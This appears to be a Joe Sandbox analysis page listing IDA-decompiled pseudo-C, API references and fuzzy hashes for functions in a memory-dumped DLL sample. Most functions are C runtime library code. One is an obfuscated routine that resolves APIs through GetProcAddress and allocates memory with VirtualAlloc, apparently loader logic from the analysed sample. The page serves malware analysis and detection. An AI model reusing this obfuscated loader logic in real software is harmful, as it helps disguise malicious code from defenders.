            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap
            • String ID:
            • API String ID: 1993637811-0
            • Opcode ID: 1013eba4e5562f3d8dfc814a58c35e6665841e7185b3ecc7bb528578234fffd5
            • Instruction ID: 0810b439916e4b646fc2f827997c8d2e57cf25fd2439668f7fa243db4e915aac
            • Opcode Fuzzy Hash: 1013eba4e5562f3d8dfc814a58c35e6665841e7185b3ecc7bb528578234fffd5
            • Instruction Fuzzy Hash: 3E01D8776016177B6B1556BA5C8CD7B2A7DDFC7A91316011EF924C3E00EB608D0181F0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50CA59 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
            Download Yara Rule
            C-Code - Quality: 95%
            			E6D50CA59(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x6d55dc90 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x6d539670 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xc2f81199
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










            0x6d50ca5e
            0x6d50ca62
            0x6d50ca69
            0x6d50ca6d
            0x6d50ca7b
            0x6d50ca91
            0x6d50ca95
            0x6d50cabe
            0x6d50cac0
            0x6d50cac4
            0x6d50cac7
            0x6d50cac7
            0x6d50cacd
            0x6d50cacf
            0x00000000
            0x6d50cad0
            0x6d50ca97
            0x6d50caa0
            0x6d50caaf
            0x6d50caa2
            0x6d50caa5
            0x6d50caab
            0x6d50caab
            0x6d50cab3
            0x00000000
            0x6d50cab5
            0x6d50cab8
            0x6d50caba
            0x00000000
            0x6d50caba
            0x6d50cab3
            0x6d50ca6f
            0x6d50ca74
            0x00000000

            APIs
            • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,6D50CA00,?,00000001,00000000,?,?,6D50CE4B,00000008,GetCurrentPackageId), ref: 6D50CA8B
            • GetLastError.KERNEL32(?,6D50CA00,?,00000001,00000000,?,?,6D50CE4B,00000008,GetCurrentPackageId,6D539B48,GetCurrentPackageId,00000000), ref: 6D50CA97
            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,6D50CA00,?,00000001,00000000,?,?,6D50CE4B,00000008,GetCurrentPackageId,6D539B48,GetCurrentPackageId,00000000), ref: 6D50CAA5
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: b3305a36941746b9fbdf43aaec4aa69123dbd6b33dc5709246f5686035d6fb43
            • Instruction ID: 86a01d814bd3c7a38d2acc67e006ba4d0be947cb9d37a03154583fbf8b7eb709
            • Opcode Fuzzy Hash: b3305a36941746b9fbdf43aaec4aa69123dbd6b33dc5709246f5686035d6fb43
            • Instruction Fuzzy Hash: 1101A736656223AFCF26DA788C45B6677B8AF477617164E21F926D7A40D720D800C6F0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50C854 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
            Download Yara Rule
            C-Code - Quality: 72%
            			E6D50C854(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6d55ce4c; // 0x4
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6D50B523(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6D50CC4A(_t25, _t36, __eflags,  *0x6d55ce4c, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6D50C69A(_t25, _t31, 0x6d55dfbc);
							E6D50B3FE(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6D50B3FE();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6D50B4E0(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6d55ce4c; // 0x4
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6D50B523(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6D50CC4A(_t27, _t37, __eflags,  *0x6d55ce4c, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6D50C69A(_t27, _t32, 0x6d55dfbc);
									E6D50B3FE(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6D50B3FE();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6D50CBF4(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6D50CBF4(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















            0x6d50c854
            0x6d50c854
            0x6d50c854
            0x6d50c85e
            0x6d50c860
            0x6d50c865
            0x6d50c868
            0x6d50c876
            0x6d50c87d
            0x6d50c882
            0x6d50c885
            0x6d50c888
            0x6d50c89a
            0x6d50c89f
            0x6d50c8a1
            0x6d50c8ac
            0x6d50c8b3
            0x6d50c8b8
            0x6d50c8bb
            0x6d50c8bd
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d50c8a3
            0x6d50c8a3
            0x00000000
            0x6d50c8a3
            0x6d50c88a
            0x6d50c88a
            0x6d50c88b
            0x6d50c88b
            0x6d50c890
            0x6d50c8cb
            0x6d50c8cc
            0x6d50c8d2
            0x6d50c8d7
            0x6d50c8da
            0x6d50c8db
            0x6d50c8dc
            0x6d50c8e3
            0x6d50c8e5
            0x6d50c8e7
            0x6d50c8ec
            0x6d50c8ef
            0x6d50c8fd
            0x6d50c909
            0x6d50c90c
            0x6d50c90f
            0x6d50c921
            0x6d50c926
            0x6d50c928
            0x6d50c933
            0x6d50c939
            0x6d50c941
            0x6d50c943
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d50c92a
            0x6d50c92a
            0x00000000
            0x6d50c92a
            0x6d50c911
            0x6d50c911
            0x6d50c912
            0x6d50c912
            0x6d50c945
            0x6d50c946
            0x6d50c946
            0x6d50c8f1
            0x6d50c8f7
            0x6d50c8fb
            0x6d50c94e
            0x6d50c94f
            0x6d50c955
            0x00000000
            0x00000000
            0x00000000
            0x6d50c8fb
            0x6d50c95c
            0x6d50c95c
            0x6d50c86a
            0x6d50c870
            0x6d50c874
            0x6d50c8bf
            0x6d50c8c0
            0x6d50c8ca
            0x00000000
            0x00000000
            0x00000000
            0x6d50c874

            APIs
            • GetLastError.KERNEL32(?,7FFFFFFF,6D50B5BE,7FFFFFFF,?,?,6D50F735,00000000,-00000002,00000000,00000000,?), ref: 6D50C858
            • SetLastError.KERNEL32(00000000,-00000002,00000000,00000000,?), ref: 6D50C8C0
            • SetLastError.KERNEL32(00000000,-00000002,00000000,00000000,?), ref: 6D50C8CC
            • _abort.LIBCMT ref: 6D50C8D2
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ErrorLast$_abort
            • String ID:
            • API String ID: 88804580-0
            • Opcode ID: 1f78ff8c2d104d5b51eff98f0432aa089da0e76db7a6450d8762cab110147323
            • Instruction ID: 43e23305d1d31deae87f778f7f32cb5f55ae3ed74ba9a86c315b4dcaaab53626
            • Opcode Fuzzy Hash: 1f78ff8c2d104d5b51eff98f0432aa089da0e76db7a6450d8762cab110147323
            • Instruction Fuzzy Hash: 89F0A436548A0227DB1F63389C46B7A2739AFC3765F274934FA38A6E90FF60C8014138
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D509556 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E6D509556() {
				void* _t4;
				void* _t8;

				E6D509BB7();
				E6D509B4B();
				if(E6D509871() != 0) {
					_t4 = E6D509823(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E6D5098AD();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





            0x6d509556
            0x6d50955b
            0x6d509567
            0x6d50956c
            0x6d509571
            0x6d509573
            0x6d50957e
            0x6d509575
            0x6d509575
            0x00000000
            0x6d509575
            0x6d509569
            0x6d509569
            0x6d50956b
            0x6d50956b

            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 6D509556
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 6D50955B
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 6D509560
              • Part of subcall function 6D509871: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 6D509882
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 6D509575
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 01f7b16c400fcf307e9578c73aa797bece4769187de86bf5317350189038e6d2
            • Instruction ID: d90614ca0d015046cab73c324254a7e9ee5ac060ac4e7626a7eca5fafead8629
            • Opcode Fuzzy Hash: 01f7b16c400fcf307e9578c73aa797bece4769187de86bf5317350189038e6d2
            • Instruction Fuzzy Hash: 9BC04C5814C252501C4C6AB2726019D93141FE2A9CF8F58C1CBC157F4D8F06880A2C73
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D518F63 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 365COMMON
            Download Yara Rule
            C-Code - Quality: 41%
            			E6D518F63() {
				signed int _t307;
				intOrPtr _t323;
				signed int _t333;
				intOrPtr _t337;
				signed int _t376;
				intOrPtr _t399;
				signed int _t421;
				intOrPtr* _t425;
				void* _t426;
				void* _t427;

				_t337 =  *0x6d540000; // 0xb0b7c8
				 *_t425 = _t337;
				 *((intOrPtr*)(_t337 + 0x1d8)) =  *((intOrPtr*)(_t425 + 0x4c));
				 *((intOrPtr*)(_t425 + 0x14)) = 0x2872;
				 *((intOrPtr*)(_t425 + 0xc)) = 0x29d1;
				 *((intOrPtr*)(_t425 + 0x20)) = 0x1df3;
				 *((intOrPtr*)(_t425 + 0x28)) = 0;
				 *((intOrPtr*)(_t425 + 0x10)) = 0x1e7b;
				 *((intOrPtr*)(_t425 + 0x18)) = 0x1eee;
				 *((intOrPtr*)(_t425 + 0x50)) = 0x260d;
				 *((intOrPtr*)(_t425 + 0x24)) = 0x24ad;
				 *((intOrPtr*)(_t425 + 0x2c)) = 0x29d1;
				 *((intOrPtr*)(_t425 + 0x1c)) = 0x29b2;
				 *((intOrPtr*)(_t425 + 0xc)) = 0;
				 *((intOrPtr*)(_t425 + 0x3c)) =  *((intOrPtr*)(_t425 + 0x14)) + 0x9f7;
				 *((intOrPtr*)(_t425 + 0x18)) =  *((intOrPtr*)(_t425 + 0x5c)) - 0x71f;
				_push( *((intOrPtr*)(_t425 + 0x24)) + 0x2fb);
				_push( *((intOrPtr*)(_t425 + 0x34)) + 0x2749);
				_push( *((intOrPtr*)(_t425 + 0x20)) - 0x984);
				_push( *((intOrPtr*)(_t425 + 0x30)) + 0x7e3);
				_push( *((intOrPtr*)(_t425 + 0x14)) + 0x1df3);
				_push( *((intOrPtr*)(_t425 + 0x28)) - 0x140);
				_push( *((intOrPtr*)(_t425 + 0x28)));
				_push( *((intOrPtr*)(_t425 + 0x1c)) + 0xe15);
				_push( *((intOrPtr*)(_t425 + 0x38)));
				_push( *((intOrPtr*)(_t425 + 0x60)));
				 *((intOrPtr*)(_t425 + 0x40)) = E6D506FC7();
				 *((intOrPtr*)(_t425 + 0x54)) =  *((intOrPtr*)(_t425 + 0x54)) + 0x10b2;
				 *((intOrPtr*)(_t425 + 0x40)) =  *((intOrPtr*)(_t425 + 0x40)) + 0x606;
				 *((intOrPtr*)(_t425 + 0x64)) =  *((intOrPtr*)(_t425 + 0x44)) + 0xb56;
				_push( *((intOrPtr*)(_t425 + 0x58)) - 0x6ba);
				_push( *((intOrPtr*)(_t425 + 0x50)) - 0xb37);
				_push( *((intOrPtr*)(_t425 + 0x48)) - 0x9f7);
				_push( *((intOrPtr*)(_t425 + 0x4c)) - 0x73);
				_t399 =  *((intOrPtr*)(_t425 + 0x48));
				_push( *((intOrPtr*)(_t425 + 0x5c)) + 0x2597);
				_push(_t399);
				_push( *((intOrPtr*)(_t425 + 0x5c)) + 0x2872);
				_push( *((intOrPtr*)(_t425 + 0x58)) + 0x524);
				_push( *((intOrPtr*)(_t425 + 0x84)));
				 *((intOrPtr*)(_t425 + 0x70)) = E6D50768E();
				_t426 = _t425 + 0x4c;
				 *((intOrPtr*)(_t399 + 0x8c)) =  *((intOrPtr*)(_t399 + 0x1f4));
				 *((intOrPtr*)(_t426 + 0x20)) =  *((intOrPtr*)(_t426 + 0x20)) + 0x140;
				 *((intOrPtr*)(_t426 + 0x54)) =  *((intOrPtr*)(_t426 + 0x14)) + 0x28a4;
				_push( *((intOrPtr*)(_t426 + 0x10)));
				 *((intOrPtr*)(_t426 + 0x54)) =  *((intOrPtr*)(_t426 + 0x20)) + 0x101;
				 *((intOrPtr*)(_t426 + 0x50)) =  *((intOrPtr*)(_t426 + 0x18)) + 0x2ea5;
				 *((intOrPtr*)(_t426 + 0x4c)) =  *((intOrPtr*)(_t426 + 0x2c)) + 0x111;
				 *((intOrPtr*)(_t426 + 0x48)) =  *((intOrPtr*)(_t426 + 0x20)) + 0xb37;
				 *((intOrPtr*)(_t426 + 0x44)) =  *((intOrPtr*)(_t426 + 0x28)) + 0x8ce;
				 *((intOrPtr*)(_t426 + 0x40)) =  *((intOrPtr*)(_t426 + 0x60)) + 0x898;
				_push( *((intOrPtr*)(_t426 + 0x18)) + 0x1e7b);
				_push( *((intOrPtr*)(_t426 + 0x30)) - 0x10b2);
				_push( *((intOrPtr*)(_t426 + 0x28)) + 0x102a);
				_push( *((intOrPtr*)(_t426 + 0x34)) - 0x632);
				_push( *((intOrPtr*)(_t426 + 0x38)) + 0x1df3);
				_push( *((intOrPtr*)(_t426 + 0x24)));
				_push( *((intOrPtr*)(_t426 + 0x3c)));
				_push( *((intOrPtr*)(_t426 + 0x5c)));
				_push( *((intOrPtr*)(_t426 + 0x64)));
				_push( *((intOrPtr*)(_t426 + 0x6c)));
				_push( *((intOrPtr*)(_t426 + 0x74)));
				_push( *((intOrPtr*)(_t426 + 0x7c)));
				_push( *((intOrPtr*)(_t426 + 0x84)));
				_push( *((intOrPtr*)(_t426 + 0x8c)));
				 *((intOrPtr*)(_t426 + 0x98)) = E6D502AE5();
				 *((intOrPtr*)(_t426 + 0x7c)) =  *((intOrPtr*)(_t426 + 0x64)) + 0x4f3;
				 *((intOrPtr*)(_t426 + 0x80)) =  *((intOrPtr*)(_t426 + 0x54)) - 0xbc5;
				 *((intOrPtr*)(_t426 + 0x84)) =  *((intOrPtr*)(_t426 + 0x54)) - 0xcc0;
				 *((intOrPtr*)(_t426 + 0x88)) =  *((intOrPtr*)(_t426 + 0x64)) - 0x505;
				 *((intOrPtr*)(_t426 + 0x8c)) =  *((intOrPtr*)(_t426 + 0x70)) + 0x2b78;
				_push( *((intOrPtr*)(_t426 + 0x4c)));
				_push( *((intOrPtr*)(_t426 + 0x70)) - 0x632);
				_push( *((intOrPtr*)(_t426 + 0x68)) + 0x4f3);
				_push( *((intOrPtr*)(_t426 + 0x68)) - 0x505);
				_push( *((intOrPtr*)(_t426 + 0x98)) - 0xab1);
				_push( *((intOrPtr*)(_t426 + 0x98)) - 0x6bb);
				_push( *((intOrPtr*)(_t426 + 0x70)) + 0x1df3);
				_push( *((intOrPtr*)(_t426 + 0x5c)) - 0xb37);
				_push( *((intOrPtr*)(_t426 + 0xac)));
				_push( *((intOrPtr*)(_t426 + 0xac)));
				_push( *((intOrPtr*)(_t426 + 0xac)));
				_push( *((intOrPtr*)(_t426 + 0xac)));
				_push( *((intOrPtr*)(_t426 + 0xac)));
				 *((intOrPtr*)(_t426 + 0x98)) = E6D50391B();
				_t427 = _t426 + 0x70;
				if( *(_t427 + 0x14) >=  *(_t427 + 0x1c) + 0x9f7) {
					L3:
					_t376 =  *(_t427 + 0x10);
					L4:
					return  *((intOrPtr*)(_t376 + 0x15c));
				}
				if( *(_t427 + 0x14) >=  *(_t427 + 0x18) + 0xfffffa7b) {
					_t333 =  *(_t427 + 0x20);
					 *(_t427 + 0x38) = _t333;
					if(_t333 ==  *((intOrPtr*)(_t427 + 0x24)) -  *(_t427 + 0x1c)) {
						goto L3;
					}
					_t376 =  *(_t427 + 0x10);
					do {
						if( *(_t427 + 0x20) < ( *(_t427 + 0x1c) & 0x00002c90)) {
							 *((intOrPtr*)(_t427 + 0x3c)) =  *((intOrPtr*)(_t376 + 0x104)) -  *((intOrPtr*)(_t427 + 0x24));
							 *(_t427 + 0x40) = ( *(_t376 + 0x1d4) | 0x00002872) ^ 0x000024ad;
							 *(_t427 + 0x44) =  *(_t427 + 0x5c) *  *(_t376 + 0xe8);
							 *(_t427 + 0x48) =  *(_t376 + 0x74) & 0x00002749;
							 *(_t427 + 0x50) =  *(_t427 + 0x14) +  *(_t427 + 0x5c);
							 *((intOrPtr*)(_t427 + 0x4c)) =  *(_t427 + 0x14) -  *((intOrPtr*)(_t376 + 0x90)) -  *(_t427 + 0x30);
							 *((intOrPtr*)(_t427 + 0x54)) =  *(_t427 + 0x14) + ( *(_t427 + 0x14) ^  *(_t427 + 0x5c));
							_t421 =  *(_t427 + 0x10);
							_push( *( *(_t427 + 0x10) + 0x13c) &  *(_t421 + 0x1d4));
							_push(( *(_t427 + 0x1c) ^ 0x00000a68) & 0x00001eee);
							_push( *(_t427 + 0x18) * 0x2749);
							_push(( *(_t376 + 0x17c) &  *(_t376 + 0xd8)) - 0x1eee);
							_push(_t421);
							_push( *(_t427 + 0x18) +  *((intOrPtr*)(_t427 + 0x24)) +  *(_t376 + 0xd4));
							_push(( *(_t376 + 8) | 0x000029d1) * 0x2597);
							_push( *((intOrPtr*)(_t427 + 0x68)));
							_push( *((intOrPtr*)(_t427 + 0x70)));
							_push( *((intOrPtr*)(_t427 + 0x70)));
							_push( *((intOrPtr*)(_t427 + 0x70)));
							_push( *((intOrPtr*)(_t427 + 0x70)));
							_push( *((intOrPtr*)(_t427 + 0x70)));
							_push( *((intOrPtr*)(_t427 + 0x70)));
							_t307 = E6D515588();
							_t376 =  *(_t427 + 0x48);
							_t427 = _t427 + 0x38;
							_t333 =  *(_t427 + 0x38);
							 *(_t427 + 0x34) = _t307;
						}
						_t333 = _t333 + 3;
						 *(_t427 + 0x5c) =  *(_t427 + 0x5c) + ( *(_t427 + 0x5c) &  *(_t376 + 0xd4)) -  *((intOrPtr*)(_t376 + 0x90));
						 *(_t427 + 0x38) = _t333;
						 *(_t427 + 0x2c) =  *(_t427 + 0x2c) ^ ( *(_t376 + 0x148) & 0x000028a4) + 0x00002ac3;
						 *(_t427 + 0x30) =  *(_t427 + 0x30) ^  *(_t427 + 0x1c) +  *(_t427 + 0x20) *  *(_t376 + 0x1d4);
						 *(_t376 + 0x1d4) =  *(_t376 + 0x1d4) + ( *(_t376 + 0x158) & 0x000029d1);
						 *(_t376 + 0x80) =  *(_t376 + 0x80) ^  *(_t427 + 0x14) * ( *(_t427 + 0x5c) -  *(_t427 + 0x30));
						 *(_t376 + 0x80) =  *(_t376 + 0x80) -  *(_t427 + 0x34) * ( *(_t376 + 0x1c) ^  *(_t376 + 0x130));
					} while (_t333 !=  *((intOrPtr*)(_t427 + 0x24)) -  *(_t427 + 0x1c));
					goto L4;
				}
				 *((intOrPtr*)(_t427 + 0x3c)) =  *(_t427 + 0x2c) - 0xcbc;
				 *(_t427 + 0x40) =  *(_t427 + 0x18) - 0x606;
				 *(_t427 + 0x44) =  *(_t427 + 0x18) - 0xc38;
				 *(_t427 + 0x48) =  *(_t427 + 0x14) + 0x2ab3;
				 *((intOrPtr*)(_t427 + 0x4c)) =  *(_t427 + 0x34) + 0x2c90;
				 *(_t427 + 0x50) =  *(_t427 + 0x1c);
				 *((intOrPtr*)(_t427 + 0x54)) =  *((intOrPtr*)(_t427 + 0x28)) - 0x2c4;
				_push( *(_t427 + 0x2c) - 0x102a);
				_push( *(_t427 + 0x2c) - 0x977);
				_push( *(_t427 + 0x5c) - 0x32);
				_push( *(_t427 + 0x38) - 0x7e8);
				_push( *(_t427 + 0x2c) - 0x3f2);
				_push( *(_t427 + 0x18) - 0xcc0);
				_push( *(_t427 + 0x5c) + 0x12d);
				_push( *(_t427 + 0x2c));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_t323 = E6D5173B5();
				_t427 = _t427 + 0x3c;
				 *((intOrPtr*)(_t427 + 0x24)) = _t323;
				goto L3;
			}













            0x6d518f66
            0x6d518f70
            0x6d518f74
            0x6d518f7f
            0x6d518f8c
            0x6d518f90
            0x6d518f94
            0x6d518f9c
            0x6d518fa4
            0x6d518fac
            0x6d518fb4
            0x6d518fbc
            0x6d518fc0
            0x6d518fc9
            0x6d518fdc
            0x6d51901b
            0x6d51902e
            0x6d51902f
            0x6d519030
            0x6d519031
            0x6d519032
            0x6d519033
            0x6d519034
            0x6d519038
            0x6d519039
            0x6d51903d
            0x6d519046
            0x6d51904a
            0x6d519052
            0x6d519096
            0x6d5190a9
            0x6d5190aa
            0x6d5190ab
            0x6d5190ac
            0x6d5190ad
            0x6d5190b1
            0x6d5190b2
            0x6d5190b3
            0x6d5190b4
            0x6d5190b5
            0x6d5190c1
            0x6d5190c5
            0x6d5190ce
            0x6d5190d4
            0x6d5190e5
            0x6d5190ed
            0x6d5190f6
            0x6d519103
            0x6d519110
            0x6d51911d
            0x6d51912a
            0x6d519161
            0x6d519174
            0x6d519175
            0x6d519176
            0x6d519177
            0x6d519178
            0x6d519179
            0x6d51917a
            0x6d51917b
            0x6d51917f
            0x6d519183
            0x6d519187
            0x6d51918b
            0x6d51918f
            0x6d519196
            0x6d5191a2
            0x6d5191b7
            0x6d5191c4
            0x6d5191d4
            0x6d5191e1
            0x6d519219
            0x6d519226
            0x6d519243
            0x6d519244
            0x6d519245
            0x6d519246
            0x6d519247
            0x6d519248
            0x6d519249
            0x6d51924a
            0x6d519251
            0x6d519258
            0x6d51925f
            0x6d519266
            0x6d519272
            0x6d519279
            0x6d519289
            0x6d51936d
            0x6d51936d
            0x6d519371
            0x6d51937e
            0x6d51937e
            0x6d51929c
            0x6d51937f
            0x6d51938b
            0x6d519391
            0x00000000
            0x00000000
            0x6d519393
            0x6d519397
            0x6d5193a4
            0x6d5193c1
            0x6d5193ca
            0x6d5193e3
            0x6d5193ef
            0x6d519401
            0x6d519405
            0x6d519421
            0x6d519425
            0x6d519476
            0x6d519477
            0x6d519478
            0x6d519479
            0x6d51947a
            0x6d51947f
            0x6d519480
            0x6d519481
            0x6d519482
            0x6d519486
            0x6d51948a
            0x6d51948e
            0x6d519492
            0x6d519496
            0x6d51949a
            0x6d51949f
            0x6d5194a3
            0x6d5194a6
            0x6d5194aa
            0x6d5194aa
            0x6d5194b2
            0x6d5194c1
            0x6d5194d0
            0x6d5194d9
            0x6d5194ee
            0x6d5194fd
            0x6d519518
            0x6d51952a
            0x6d519538
            0x00000000
            0x6d519540
            0x6d5192ab
            0x6d5192b8
            0x6d5192c5
            0x6d5192d2
            0x6d5192df
            0x6d5192e7
            0x6d519327
            0x6d51933a
            0x6d51933b
            0x6d51933c
            0x6d51933d
            0x6d51933e
            0x6d51933f
            0x6d519340
            0x6d519341
            0x6d519345
            0x6d519349
            0x6d51934d
            0x6d519351
            0x6d519355
            0x6d519359
            0x6d51935d
            0x6d519361
            0x6d519366
            0x6d519369
            0x00000000

            APIs
              • Part of subcall function 6D50768E: SNifCw242OCD._RSR(?,?,?,?,?,-FFFFF54B,?,?,?,?,?,?,?), ref: 6D50775D
              • Part of subcall function 6D50768E: Mqae01id._RSR(?,?,?,?,-000001B2,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5077CA
              • Part of subcall function 6D50391B: GetProcAddress.KERNEL32(?,?), ref: 6D5039B2
              • Part of subcall function 6D50391B: GetProcAddress.KERNEL32(?,?), ref: 6D503C34
              • Part of subcall function 6D50391B: VirtualAlloc.KERNEL32(00000000,?,?,00000004), ref: 6D503C97
            • SNifCw242OCD._RSR(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D51949A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
